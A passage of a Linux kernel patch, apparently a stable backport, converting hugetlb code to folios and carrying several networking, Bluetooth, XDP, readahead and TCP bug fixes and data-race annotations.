+ 	bool restore_reserve;
+ 	unsigned long flags;
+ 
+-	VM_BUG_ON_PAGE(page_count(page), page);
+-	VM_BUG_ON_PAGE(page_mapcount(page), page);
++	VM_BUG_ON_FOLIO(folio_ref_count(folio), folio);
++	VM_BUG_ON_FOLIO(folio_mapcount(folio), folio);
+ 
+-	hugetlb_set_page_subpool(page, NULL);
+-	if (PageAnon(page))
+-		__ClearPageAnonExclusive(page);
+-	page->mapping = NULL;
+-	restore_reserve = HPageRestoreReserve(page);
+-	ClearHPageRestoreReserve(page);
++	hugetlb_set_folio_subpool(folio, NULL);
++	if (folio_test_anon(folio))
++		__ClearPageAnonExclusive(&folio->page);
++	folio->mapping = NULL;
++	restore_reserve = folio_test_hugetlb_restore_reserve(folio);
++	folio_clear_hugetlb_restore_reserve(folio);
+ 
+ 	/*
+ 	 * If HPageRestoreReserve was set on page, page allocation consumed a
+@@ -1953,15 +1954,15 @@ void free_huge_page(struct page *page)
+ 	}
+ 
+ 	spin_lock_irqsave(&hugetlb_lock, flags);
+-	ClearHPageMigratable(page);
+-	hugetlb_cgroup_uncharge_page(hstate_index(h),
+-				     pages_per_huge_page(h), page);
+-	hugetlb_cgroup_uncharge_page_rsvd(hstate_index(h),
+-					  pages_per_huge_page(h), page);
++	folio_clear_hugetlb_migratable(folio);
++	hugetlb_cgroup_uncharge_folio(hstate_index(h),
++				     pages_per_huge_page(h), folio);
++	hugetlb_cgroup_uncharge_folio_rsvd(hstate_index(h),
++					  pages_per_huge_page(h), folio);
+ 	if (restore_reserve)
+ 		h->resv_huge_pages++;
+ 
+-	if (HPageTemporary(page)) {
++	if (folio_test_hugetlb_temporary(folio)) {
+ 		remove_hugetlb_page(h, page, false);
+ 		spin_unlock_irqrestore(&hugetlb_lock, flags);
+ 		update_and_free_page(h, page, true);
+@@ -3080,6 +3081,7 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 	struct hugepage_subpool *spool = subpool_vma(vma);
+ 	struct hstate *h = hstate_vma(vma);
+ 	struct page *page;
++	struct folio *folio;
+ 	long map_chg, map_commit;
+ 	long gbl_chg;
+ 	int ret, idx;
+@@ -3143,6 +3145,7 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 	 * a reservation exists for the allocation.
+ 	 */
+ 	page = dequeue_huge_page_vma(h, vma, addr, avoid_reserve, gbl_chg);
++
+ 	if (!page) {
+ 		spin_unlock_irq(&hugetlb_lock);
+ 		page = alloc_buddy_huge_page_with_mpol(h, vma, addr);
+@@ -3157,6 +3160,7 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 		set_page_refcounted(page);
+ 		/* Fall through */
+ 	}
++	folio = page_folio(page);
+ 	hugetlb_cgroup_commit_charge(idx, pages_per_huge_page(h), h_cg, page);
+ 	/* If allocation is not consuming a reservation, also store the
+ 	 * hugetlb_cgroup pointer on the page.
+@@ -3185,9 +3189,12 @@ struct page *alloc_huge_page(struct vm_area_struct *vma,
+ 
+ 		rsv_adjust = hugepage_subpool_put_pages(spool, 1);
+ 		hugetlb_acct_memory(h, -rsv_adjust);
+-		if (deferred_reserve)
+-			hugetlb_cgroup_uncharge_page_rsvd(hstate_index(h),
+-					pages_per_huge_page(h), page);
++		if (deferred_reserve) {
++			spin_lock_irq(&hugetlb_lock);
++			hugetlb_cgroup_uncharge_folio_rsvd(hstate_index(h),
++					pages_per_huge_page(h), folio);
++			spin_unlock_irq(&hugetlb_lock);
++		}
+ 	}
+ 	return page;
+ 
+diff --git a/mm/hugetlb_cgroup.c b/mm/hugetlb_cgroup.c
+index f61d132df52b3..32f4408eda240 100644
+--- a/mm/hugetlb_cgroup.c
++++ b/mm/hugetlb_cgroup.c
+@@ -191,8 +191,9 @@ static void hugetlb_cgroup_move_parent(int idx, struct hugetlb_cgroup *h_cg,
+ 	struct page_counter *counter;
+ 	struct hugetlb_cgroup *page_hcg;
+ 	struct hugetlb_cgroup *parent = parent_hugetlb_cgroup(h_cg);
++	struct folio *folio = page_folio(page);
+ 
+-	page_hcg = hugetlb_cgroup_from_page(page);
++	page_hcg = hugetlb_cgroup_from_folio(folio);
+ 	/*
+ 	 * We can have pages in active list without any cgroup
+ 	 * ie, hugepage with less than 3 pages. We can safely
+@@ -314,7 +315,7 @@ static void __hugetlb_cgroup_commit_charge(int idx, unsigned long nr_pages,
+ 	if (hugetlb_cgroup_disabled() || !h_cg)
+ 		return;
+ 
+-	__set_hugetlb_cgroup(page, h_cg, rsvd);
++	__set_hugetlb_cgroup(page_folio(page), h_cg, rsvd);
+ 	if (!rsvd) {
+ 		unsigned long usage =
+ 			h_cg->nodeinfo[page_to_nid(page)]->usage[idx];
+@@ -345,18 +346,18 @@ void hugetlb_cgroup_commit_charge_rsvd(int idx, unsigned long nr_pages,
+ /*
+  * Should be called with hugetlb_lock held
+  */
+-static void __hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-					   struct page *page, bool rsvd)
++static void __hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++					   struct folio *folio, bool rsvd)
+ {
+ 	struct hugetlb_cgroup *h_cg;
+ 
+ 	if (hugetlb_cgroup_disabled())
+ 		return;
+ 	lockdep_assert_held(&hugetlb_lock);
+-	h_cg = __hugetlb_cgroup_from_page(page, rsvd);
++	h_cg = __hugetlb_cgroup_from_folio(folio, rsvd);
+ 	if (unlikely(!h_cg))
+ 		return;
+-	__set_hugetlb_cgroup(page, NULL, rsvd);
++	__set_hugetlb_cgroup(folio, NULL, rsvd);
+ 
+ 	page_counter_uncharge(__hugetlb_cgroup_counter_from_cgroup(h_cg, idx,
+ 								   rsvd),
+@@ -366,27 +367,27 @@ static void __hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+ 		css_put(&h_cg->css);
+ 	else {
+ 		unsigned long usage =
+-			h_cg->nodeinfo[page_to_nid(page)]->usage[idx];
++			h_cg->nodeinfo[folio_nid(folio)]->usage[idx];
+ 		/*
+ 		 * This write is not atomic due to fetching usage and writing
+ 		 * to it, but that's fine because we call this with
+ 		 * hugetlb_lock held anyway.
+ 		 */
+-		WRITE_ONCE(h_cg->nodeinfo[page_to_nid(page)]->usage[idx],
++		WRITE_ONCE(h_cg->nodeinfo[folio_nid(folio)]->usage[idx],
+ 			   usage - nr_pages);
+ 	}
+ }
+ 
+-void hugetlb_cgroup_uncharge_page(int idx, unsigned long nr_pages,
+-				  struct page *page)
++void hugetlb_cgroup_uncharge_folio(int idx, unsigned long nr_pages,
++				  struct folio *folio)
+ {
+-	__hugetlb_cgroup_uncharge_page(idx, nr_pages, page, false);
++	__hugetlb_cgroup_uncharge_folio(idx, nr_pages, folio, false);
+ }
+ 
+-void hugetlb_cgroup_uncharge_page_rsvd(int idx, unsigned long nr_pages,
+-				       struct page *page)
++void hugetlb_cgroup_uncharge_folio_rsvd(int idx, unsigned long nr_pages,
++				       struct folio *folio)
+ {
+-	__hugetlb_cgroup_uncharge_page(idx, nr_pages, page, true);
++	__hugetlb_cgroup_uncharge_folio(idx, nr_pages, folio, true);
+ }
+ 
+ static void __hugetlb_cgroup_uncharge_cgroup(int idx, unsigned long nr_pages,
+@@ -888,13 +889,14 @@ void hugetlb_cgroup_migrate(struct page *oldhpage, struct page *newhpage)
+ 	struct hugetlb_cgroup *h_cg;
+ 	struct hugetlb_cgroup *h_cg_rsvd;
+ 	struct hstate *h = page_hstate(oldhpage);
++	struct folio *old_folio = page_folio(oldhpage);
+ 
+ 	if (hugetlb_cgroup_disabled())
+ 		return;
+ 
+ 	spin_lock_irq(&hugetlb_lock);
+-	h_cg = hugetlb_cgroup_from_page(oldhpage);
+-	h_cg_rsvd = hugetlb_cgroup_from_page_rsvd(oldhpage);
++	h_cg = hugetlb_cgroup_from_folio(old_folio);
++	h_cg_rsvd = hugetlb_cgroup_from_folio_rsvd(old_folio);
+ 	set_hugetlb_cgroup(oldhpage, NULL);
+ 	set_hugetlb_cgroup_rsvd(oldhpage, NULL);
+ 
+diff --git a/mm/migrate.c b/mm/migrate.c
+index c5968021fde0a..0252aa4ff572e 100644
+--- a/mm/migrate.c
++++ b/mm/migrate.c
+@@ -1632,7 +1632,7 @@ struct page *alloc_migration_target(struct page *page, unsigned long private)
+ 		nid = folio_nid(folio);
+ 
+ 	if (folio_test_hugetlb(folio)) {
+-		struct hstate *h = page_hstate(&folio->page);
++		struct hstate *h = folio_hstate(folio);
+ 
+ 		gfp_mask = htlb_modify_alloc_mask(h, gfp_mask);
+ 		return alloc_huge_page_nodemask(h, nid, mtc->nmask, gfp_mask);
+diff --git a/mm/readahead.c b/mm/readahead.c
+index e4b772bb70e68..794d8ddc06972 100644
+--- a/mm/readahead.c
++++ b/mm/readahead.c
+@@ -504,6 +504,7 @@ void page_cache_ra_order(struct readahead_control *ractl,
+ 	pgoff_t index = readahead_index(ractl);
+ 	pgoff_t limit = (i_size_read(mapping->host) - 1) >> PAGE_SHIFT;
+ 	pgoff_t mark = index + ra->size - ra->async_size;
++	unsigned int nofs;
+ 	int err = 0;
+ 	gfp_t gfp = readahead_gfp_mask(mapping);
+ 
+@@ -520,6 +521,8 @@ void page_cache_ra_order(struct readahead_control *ractl,
+ 			new_order--;
+ 	}
+ 
++	/* See comment in page_cache_ra_unbounded() */
++	nofs = memalloc_nofs_save();
+ 	filemap_invalidate_lock_shared(mapping);
+ 	while (index <= limit) {
+ 		unsigned int order = new_order;
+@@ -548,6 +551,7 @@ void page_cache_ra_order(struct readahead_control *ractl,
+ 
+ 	read_pages(ractl);
+ 	filemap_invalidate_unlock_shared(mapping);
++	memalloc_nofs_restore(nofs);
+ 
+ 	/*
+ 	 * If there were already pages in the page cache, then we may have
+diff --git a/net/bluetooth/hci_core.c b/net/bluetooth/hci_core.c
+index 02e67ff05b7b4..d6be3cb86598e 100644
+--- a/net/bluetooth/hci_core.c
++++ b/net/bluetooth/hci_core.c
+@@ -2733,8 +2733,6 @@ void hci_unregister_dev(struct hci_dev *hdev)
+ 
+ 	hci_unregister_suspend_notifier(hdev);
+ 
+-	msft_unregister(hdev);
+-
+ 	hci_dev_do_close(hdev);
+ 
+ 	if (!test_bit(HCI_INIT, &hdev->flags) &&
+@@ -2788,6 +2786,7 @@ void hci_release_dev(struct hci_dev *hdev)
+ 	hci_discovery_filter_clear(hdev);
+ 	hci_blocked_keys_clear(hdev);
+ 	hci_codec_list_clear(&hdev->local_codecs);
++	msft_release(hdev);
+ 	hci_dev_unlock(hdev);
+ 
+ 	ida_simple_remove(&hci_index_ida, hdev->id);
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index b4cba55be5ad9..c34011113d4c5 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -435,6 +435,9 @@ static void l2cap_chan_timeout(struct work_struct *work)
+ 
+ 	BT_DBG("chan %p state %s", chan, state_to_string(chan->state));
+ 
++	if (!conn)
++		return;
++
+ 	mutex_lock(&conn->chan_lock);
+ 	/* __set_chan_timer() calls l2cap_chan_hold(chan) while scheduling
+ 	 * this work. No need to call l2cap_chan_hold(chan) here again.
+diff --git a/net/bluetooth/msft.c b/net/bluetooth/msft.c
+index bee6a4c656be4..076cf8bce4d9e 100644
+--- a/net/bluetooth/msft.c
++++ b/net/bluetooth/msft.c
+@@ -584,7 +584,7 @@ void msft_register(struct hci_dev *hdev)
+ 	hdev->msft_data = msft;
+ }
+ 
+-void msft_unregister(struct hci_dev *hdev)
++void msft_release(struct hci_dev *hdev)
+ {
+ 	struct msft_data *msft = hdev->msft_data;
+ 
+diff --git a/net/bluetooth/msft.h b/net/bluetooth/msft.h
+index 2a63205b377b7..fe538e9c91c01 100644
+--- a/net/bluetooth/msft.h
++++ b/net/bluetooth/msft.h
+@@ -14,7 +14,7 @@
+ 
+ bool msft_monitor_supported(struct hci_dev *hdev);
+ void msft_register(struct hci_dev *hdev);
+-void msft_unregister(struct hci_dev *hdev);
++void msft_release(struct hci_dev *hdev);
+ void msft_do_open(struct hci_dev *hdev);
+ void msft_do_close(struct hci_dev *hdev);
+ void msft_vendor_evt(struct hci_dev *hdev, void *data, struct sk_buff *skb);
+@@ -35,7 +35,7 @@ static inline bool msft_monitor_supported(struct hci_dev *hdev)
+ }
+ 
+ static inline void msft_register(struct hci_dev *hdev) {}
+-static inline void msft_unregister(struct hci_dev *hdev) {}
++static inline void msft_release(struct hci_dev *hdev) {}
+ static inline void msft_do_open(struct hci_dev *hdev) {}
+ static inline void msft_do_close(struct hci_dev *hdev) {}
+ static inline void msft_vendor_evt(struct hci_dev *hdev, void *data,
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 4a6bf60f3e7aa..301cf802d32c4 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -84,6 +84,10 @@ static void sco_sock_timeout(struct work_struct *work)
+ 	struct sock *sk;
+ 
+ 	sco_conn_lock(conn);
++	if (!conn->hcon) {
++		sco_conn_unlock(conn);
++		return;
++	}
+ 	sk = conn->sk;
+ 	if (sk)
+ 		sock_hold(sk);
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index 4e3394a7d7d45..9661698e86e40 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -253,6 +253,7 @@ static void maybe_deliver_addr(struct net_bridge_port *p, struct sk_buff *skb,
+ {
+ 	struct net_device *dev = BR_INPUT_SKB_CB(skb)->brdev;
+ 	const unsigned char *src = eth_hdr(skb)->h_source;
++	struct sk_buff *nskb;
+ 
+ 	if (!should_deliver(p, skb))
+ 		return;
+@@ -261,12 +262,16 @@ static void maybe_deliver_addr(struct net_bridge_port *p, struct sk_buff *skb,
+ 	if (skb->dev == p->dev && ether_addr_equal(src, addr))
+ 		return;
+ 
+-	skb = skb_copy(skb, GFP_ATOMIC);
+-	if (!skb) {
++	__skb_push(skb, ETH_HLEN);
++	nskb = pskb_copy(skb, GFP_ATOMIC);
++	__skb_pull(skb, ETH_HLEN);
++	if (!nskb) {
+ 		DEV_STATS_INC(dev, tx_dropped);
+ 		return;
+ 	}
+ 
++	skb = nskb;
++	__skb_pull(skb, ETH_HLEN);
+ 	if (!is_broadcast_ether_addr(addr))
+ 		memcpy(eth_hdr(skb)->h_dest, addr, ETH_ALEN);
+ 
+diff --git a/net/bridge/br_netlink.c b/net/bridge/br_netlink.c
+index d38eff27767dc..e9e5c77ef0f4a 100644
+--- a/net/bridge/br_netlink.c
++++ b/net/bridge/br_netlink.c
+@@ -439,7 +439,8 @@ static int br_fill_ifinfo(struct sk_buff *skb,
+ 			  u32 filter_mask, const struct net_device *dev,
+ 			  bool getlink)
+ {
+-	u8 operstate = netif_running(dev) ? dev->operstate : IF_OPER_DOWN;
++	u8 operstate = netif_running(dev) ? READ_ONCE(dev->operstate) :
++					    IF_OPER_DOWN;
+ 	struct nlattr *af = NULL;
+ 	struct net_bridge *br;
+ 	struct ifinfomsg *hdr;
+diff --git a/net/core/filter.c b/net/core/filter.c
+index cb7c4651eaec8..1d8b271ef8cc2 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -4244,10 +4244,12 @@ static __always_inline int __xdp_do_redirect_frame(struct bpf_redirect_info *ri,
+ 	enum bpf_map_type map_type = ri->map_type;
+ 	void *fwd = ri->tgt_value;
+ 	u32 map_id = ri->map_id;
++	u32 flags = ri->flags;
+ 	struct bpf_map *map;
+ 	int err;
+ 
+ 	ri->map_id = 0; /* Valid map id idr range: [1,INT_MAX[ */
++	ri->flags = 0;
+ 	ri->map_type = BPF_MAP_TYPE_UNSPEC;
+ 
+ 	if (unlikely(!xdpf)) {
+@@ -4259,11 +4261,20 @@ static __always_inline int __xdp_do_redirect_frame(struct bpf_redirect_info *ri,
+ 	case BPF_MAP_TYPE_DEVMAP:
+ 		fallthrough;
+ 	case BPF_MAP_TYPE_DEVMAP_HASH:
+-		map = READ_ONCE(ri->map);
+-		if (unlikely(map)) {
++		if (unlikely(flags & BPF_F_BROADCAST)) {
++			map = READ_ONCE(ri->map);
++
++			/* The map pointer is cleared when the map is being torn
++			 * down by bpf_clear_redirect_map()
++			 */
++			if (unlikely(!map)) {
++				err = -ENOENT;
++				break;
++			}
++
+ 			WRITE_ONCE(ri->map, NULL);
+ 			err = dev_map_enqueue_multi(xdpf, dev, map,
+-						    ri->flags & BPF_F_EXCLUDE_INGRESS);
++						    flags & BPF_F_EXCLUDE_INGRESS);
+ 		} else {
+ 			err = dev_map_enqueue(fwd, xdpf, dev);
+ 		}
+@@ -4334,9 +4345,9 @@ EXPORT_SYMBOL_GPL(xdp_do_redirect_frame);
+ static int xdp_do_generic_redirect_map(struct net_device *dev,
+ 				       struct sk_buff *skb,
+ 				       struct xdp_buff *xdp,
+-				       struct bpf_prog *xdp_prog,
+-				       void *fwd,
+-				       enum bpf_map_type map_type, u32 map_id)
++				       struct bpf_prog *xdp_prog, void *fwd,
++				       enum bpf_map_type map_type, u32 map_id,
++				       u32 flags)
+ {
+ 	struct bpf_redirect_info *ri = this_cpu_ptr(&bpf_redirect_info);
+ 	struct bpf_map *map;
+@@ -4346,11 +4357,20 @@ static int xdp_do_generic_redirect_map(struct net_device *dev,
+ 	case BPF_MAP_TYPE_DEVMAP:
+ 		fallthrough;
+ 	case BPF_MAP_TYPE_DEVMAP_HASH:
+-		map = READ_ONCE(ri->map);
+-		if (unlikely(map)) {
++		if (unlikely(flags & BPF_F_BROADCAST)) {
++			map = READ_ONCE(ri->map);
++
++			/* The map pointer is cleared when the map is being torn
++			 * down by bpf_clear_redirect_map()
++			 */
++			if (unlikely(!map)) {
++				err = -ENOENT;
++				break;
++			}
++
+ 			WRITE_ONCE(ri->map, NULL);
+ 			err = dev_map_redirect_multi(dev, skb, xdp_prog, map,
+-						     ri->flags & BPF_F_EXCLUDE_INGRESS);
++						     flags & BPF_F_EXCLUDE_INGRESS);
+ 		} else {
+ 			err = dev_map_generic_redirect(fwd, skb, xdp_prog);
+ 		}
+@@ -4387,9 +4407,11 @@ int xdp_do_generic_redirect(struct net_device *dev, struct sk_buff *skb,
+ 	enum bpf_map_type map_type = ri->map_type;
+ 	void *fwd = ri->tgt_value;
+ 	u32 map_id = ri->map_id;
++	u32 flags = ri->flags;
+ 	int err;
+ 
+ 	ri->map_id = 0; /* Valid map id idr range: [1,INT_MAX[ */
++	ri->flags = 0;
+ 	ri->map_type = BPF_MAP_TYPE_UNSPEC;
+ 
+ 	if (map_type == BPF_MAP_TYPE_UNSPEC && map_id == INT_MAX) {
+@@ -4409,7 +4431,7 @@ int xdp_do_generic_redirect(struct net_device *dev, struct sk_buff *skb,
+ 		return 0;
+ 	}
+ 
+-	return xdp_do_generic_redirect_map(dev, skb, xdp, xdp_prog, fwd, map_type, map_id);
++	return xdp_do_generic_redirect_map(dev, skb, xdp, xdp_prog, fwd, map_type, map_id, flags);
+ err:
+ 	_trace_xdp_redirect_err(dev, xdp_prog, ri->tgt_index, err);
+ 	return err;
+diff --git a/net/core/link_watch.c b/net/core/link_watch.c
+index aa6cb1f90966f..13513efcfbfe8 100644
+--- a/net/core/link_watch.c
++++ b/net/core/link_watch.c
+@@ -53,7 +53,7 @@ static void rfc2863_policy(struct net_device *dev)
+ {
+ 	unsigned char operstate = default_operstate(dev);
+ 
+-	if (operstate == dev->operstate)
++	if (operstate == READ_ONCE(dev->operstate))
+ 		return;
+ 
+ 	write_lock(&dev_base_lock);
+@@ -73,7 +73,7 @@ static void rfc2863_policy(struct net_device *dev)
+ 		break;
+ 	}
+ 
+-	dev->operstate = operstate;
++	WRITE_ONCE(dev->operstate, operstate);
+ 
+ 	write_unlock(&dev_base_lock);
+ }
+diff --git a/net/core/net-sysfs.c b/net/core/net-sysfs.c
+index 8409d41405dfe..fdf3308b03350 100644
+--- a/net/core/net-sysfs.c
++++ b/net/core/net-sysfs.c
+@@ -306,11 +306,9 @@ static ssize_t operstate_show(struct device *dev,
+ 	const struct net_device *netdev = to_net_dev(dev);
+ 	unsigned char operstate;
+ 
+-	read_lock(&dev_base_lock);
+-	operstate = netdev->operstate;
++	operstate = READ_ONCE(netdev->operstate);
+ 	if (!netif_running(netdev))
+ 		operstate = IF_OPER_DOWN;
+-	read_unlock(&dev_base_lock);
+ 
+ 	if (operstate >= ARRAY_SIZE(operstates))
+ 		return -EINVAL; /* should not happen */
+diff --git a/net/core/net_namespace.c b/net/core/net_namespace.c
+index 4c1707d0eb9b0..c33930a171629 100644
+--- a/net/core/net_namespace.c
++++ b/net/core/net_namespace.c
+@@ -68,12 +68,15 @@ DEFINE_COOKIE(net_cookie);
+ 
+ static struct net_generic *net_alloc_generic(void)
+ {
++	unsigned int gen_ptrs = READ_ONCE(max_gen_ptrs);
++	unsigned int generic_size;
+ 	struct net_generic *ng;
+-	unsigned int generic_size = offsetof(struct net_generic, ptr[max_gen_ptrs]);
++
++	generic_size = offsetof(struct net_generic, ptr[gen_ptrs]);
+ 
+ 	ng = kzalloc(generic_size, GFP_KERNEL);
+ 	if (ng)
+-		ng->s.len = max_gen_ptrs;
++		ng->s.len = gen_ptrs;
+ 
+ 	return ng;
+ }
+@@ -1217,7 +1220,11 @@ static int register_pernet_operations(struct list_head *list,
+ 		if (error < 0)
+ 			return error;
+ 		*ops->id = error;
+-		max_gen_ptrs = max(max_gen_ptrs, *ops->id + 1);
++		/* This does not require READ_ONCE as writers already hold
++		 * pernet_ops_rwsem. But WRITE_ONCE is needed to protect
++		 * net_alloc_generic.
++		 */
++		WRITE_ONCE(max_gen_ptrs, max(max_gen_ptrs, *ops->id + 1));
+ 	}
+ 	error = __register_pernet_operations(list, ops);
+ 	if (error) {
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index ac379e4590f8d..1163226c025c1 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -876,9 +876,9 @@ static void set_operstate(struct net_device *dev, unsigned char transition)
+ 		break;
+ 	}
+ 
+-	if (dev->operstate != operstate) {
++	if (READ_ONCE(dev->operstate) != operstate) {
+ 		write_lock(&dev_base_lock);
+-		dev->operstate = operstate;
++		WRITE_ONCE(dev->operstate, operstate);
+ 		write_unlock(&dev_base_lock);
+ 		netdev_state_change(dev);
+ 	}
+@@ -2443,7 +2443,7 @@ static int do_setvfinfo(struct net_device *dev, struct nlattr **tb)
+ 
+ 		nla_for_each_nested(attr, tb[IFLA_VF_VLAN_LIST], rem) {
+ 			if (nla_type(attr) != IFLA_VF_VLAN_INFO ||
+-			    nla_len(attr) < NLA_HDRLEN) {
++			    nla_len(attr) < sizeof(struct ifla_vf_vlan_info)) {
+ 				return -EINVAL;
+ 			}
+ 			if (len >= MAX_VLAN_LIST_LEN)
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index e38a4c7449f62..4d46788cd493a 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -1720,11 +1720,17 @@ static inline int skb_alloc_rx_flag(const struct sk_buff *skb)
+ 
+ struct sk_buff *skb_copy(const struct sk_buff *skb, gfp_t gfp_mask)
+ {
+-	int headerlen = skb_headroom(skb);
+-	unsigned int size = skb_end_offset(skb) + skb->data_len;
+-	struct sk_buff *n = __alloc_skb(size, gfp_mask,
+-					skb_alloc_rx_flag(skb), NUMA_NO_NODE);
++	struct sk_buff *n;
++	unsigned int size;
++	int headerlen;
++
++	if (WARN_ON_ONCE(skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST))
++		return NULL;
+ 
++	headerlen = skb_headroom(skb);
++	size = skb_end_offset(skb) + skb->data_len;
++	n = __alloc_skb(size, gfp_mask,
++			skb_alloc_rx_flag(skb), NUMA_NO_NODE);
+ 	if (!n)
+ 		return NULL;
+ 
+@@ -2037,12 +2043,17 @@ struct sk_buff *skb_copy_expand(const struct sk_buff *skb,
+ 	/*
+ 	 *	Allocate the copy buffer
+ 	 */
+-	struct sk_buff *n = __alloc_skb(newheadroom + skb->len + newtailroom,
+-					gfp_mask, skb_alloc_rx_flag(skb),
+-					NUMA_NO_NODE);
+-	int oldheadroom = skb_headroom(skb);
+ 	int head_copy_len, head_copy_off;
++	struct sk_buff *n;
++	int oldheadroom;
++
++	if (WARN_ON_ONCE(skb_shinfo(skb)->gso_type & SKB_GSO_FRAGLIST))
++		return NULL;
+ 
++	oldheadroom = skb_headroom(skb);
++	n = __alloc_skb(newheadroom + skb->len + newtailroom,
++			gfp_mask, skb_alloc_rx_flag(skb),
++			NUMA_NO_NODE);
+ 	if (!n)
+ 		return NULL;
+ 
+diff --git a/net/core/skmsg.c b/net/core/skmsg.c
+index 39643f78cf782..8b0459a6b629f 100644
+--- a/net/core/skmsg.c
++++ b/net/core/skmsg.c
+@@ -1217,11 +1217,8 @@ static void sk_psock_verdict_data_ready(struct sock *sk)
+ 
+ 		rcu_read_lock();
+ 		psock = sk_psock(sk);
+-		if (psock) {
+-			read_lock_bh(&sk->sk_callback_lock);
++		if (psock)
+ 			sk_psock_data_ready(sk, psock);
+-			read_unlock_bh(&sk->sk_callback_lock);
+-		}
+ 		rcu_read_unlock();
+ 	}
+ }
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 550af616f5359..48199e6e8f161 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -482,7 +482,7 @@ int __sock_queue_rcv_skb(struct sock *sk, struct sk_buff *skb)
+ 	unsigned long flags;
+ 	struct sk_buff_head *list = &sk->sk_receive_queue;
+ 
+-	if (atomic_read(&sk->sk_rmem_alloc) >= sk->sk_rcvbuf) {
++	if (atomic_read(&sk->sk_rmem_alloc) >= READ_ONCE(sk->sk_rcvbuf)) {
+ 		atomic_inc(&sk->sk_drops);
+ 		trace_sock_rcvqueue_full(sk, skb);
+ 		return -ENOMEM;
+@@ -552,7 +552,7 @@ int __sk_receive_skb(struct sock *sk, struct sk_buff *skb,
+ 
+ 	skb->dev = NULL;
+ 
+-	if (sk_rcvqueues_full(sk, sk->sk_rcvbuf)) {
++	if (sk_rcvqueues_full(sk, READ_ONCE(sk->sk_rcvbuf))) {
+ 		atomic_inc(&sk->sk_drops);
+ 		goto discard_and_relse;
+ 	}
+diff --git a/net/hsr/hsr_device.c b/net/hsr/hsr_device.c
+index 83906d093f0ae..ad75724b69adf 100644
+--- a/net/hsr/hsr_device.c
++++ b/net/hsr/hsr_device.c
+@@ -31,8 +31,8 @@ static bool is_slave_up(struct net_device *dev)
+ static void __hsr_set_operstate(struct net_device *dev, int transition)
+ {
+ 	write_lock(&dev_base_lock);
+-	if (dev->operstate != transition) {
+-		dev->operstate = transition;
++	if (READ_ONCE(dev->operstate) != transition) {
++		WRITE_ONCE(dev->operstate, transition);
+ 		write_unlock(&dev_base_lock);
+ 		netdev_state_change(dev);
+ 	} else {
+@@ -71,39 +71,36 @@ static bool hsr_check_carrier(struct hsr_port *master)
+ 	return false;
+ }
+ 
+-static void hsr_check_announce(struct net_device *hsr_dev,
+-			       unsigned char old_operstate)
++static void hsr_check_announce(struct net_device *hsr_dev)
+ {
+ 	struct hsr_priv *hsr;
+ 
+ 	hsr = netdev_priv(hsr_dev);
+-
+-	if (hsr_dev->operstate == IF_OPER_UP && old_operstate != IF_OPER_UP) {
+-		/* Went up */
+-		hsr->announce_count = 0;
+-		mod_timer(&hsr->announce_timer,
+-			  jiffies + msecs_to_jiffies(HSR_ANNOUNCE_INTERVAL));
++	if (netif_running(hsr_dev) && netif_oper_up(hsr_dev)) {
++		/* Enable announce timer and start sending supervisory frames */
++		if (!timer_pending(&hsr->announce_timer)) {
++			hsr->announce_count = 0;
++			mod_timer(&hsr->announce_timer, jiffies +
++				  msecs_to_jiffies(HSR_ANNOUNCE_INTERVAL));
++		}
++	} else {
++		/* Deactivate the announce timer  */
++		timer_delete(&hsr->announce_timer);
+ 	}
+-
+-	if (hsr_dev->operstate != IF_OPER_UP && old_operstate == IF_OPER_UP)
+-		/* Went down */
+-		del_timer(&hsr->announce_timer);
+ }
+ 
+ void hsr_check_carrier_and_operstate(struct hsr_priv *hsr)
+ {
+ 	struct hsr_port *master;
+-	unsigned char old_operstate;
+ 	bool has_carrier;
+ 
+ 	master = hsr_port_get_hsr(hsr, HSR_PT_MASTER);
+ 	/* netif_stacked_transfer_operstate() cannot be used here since
+ 	 * it doesn't set IF_OPER_LOWERLAYERDOWN (?)
+ 	 */
+-	old_operstate = master->dev->operstate;
+ 	has_carrier = hsr_check_carrier(master);
+ 	hsr_set_operstate(master, has_carrier);
+-	hsr_check_announce(master->dev, old_operstate);
++	hsr_check_announce(master->dev);
+ }
+ 
+ int hsr_get_max_mtu(struct hsr_priv *hsr)
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index f01c0a5d2c37b..3447a09ee83a2 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -2831,7 +2831,7 @@ void tcp_shutdown(struct sock *sk, int how)
+ 	/* If we've already sent a FIN, or it's a closed state, skip this. */
+ 	if ((1 << sk->sk_state) &
+ 	    (TCPF_ESTABLISHED | TCPF_SYN_SENT |
+-	     TCPF_SYN_RECV | TCPF_CLOSE_WAIT)) {
++	     TCPF_CLOSE_WAIT)) {
+ 		/* Clear out any half completed packets.  FIN if needed. */
+ 		if (tcp_close_state(sk))
+ 			tcp_send_fin(sk);
+@@ -2940,7 +2940,7 @@ void __tcp_close(struct sock *sk, long timeout)
+ 		 * machine. State transitions:
+ 		 *
+ 		 * TCP_ESTABLISHED -> TCP_FIN_WAIT1
+-		 * TCP_SYN_RECV	-> TCP_FIN_WAIT1 (forget it, it's impossible)
++		 * TCP_SYN_RECV	-> TCP_FIN_WAIT1 (it is difficult)
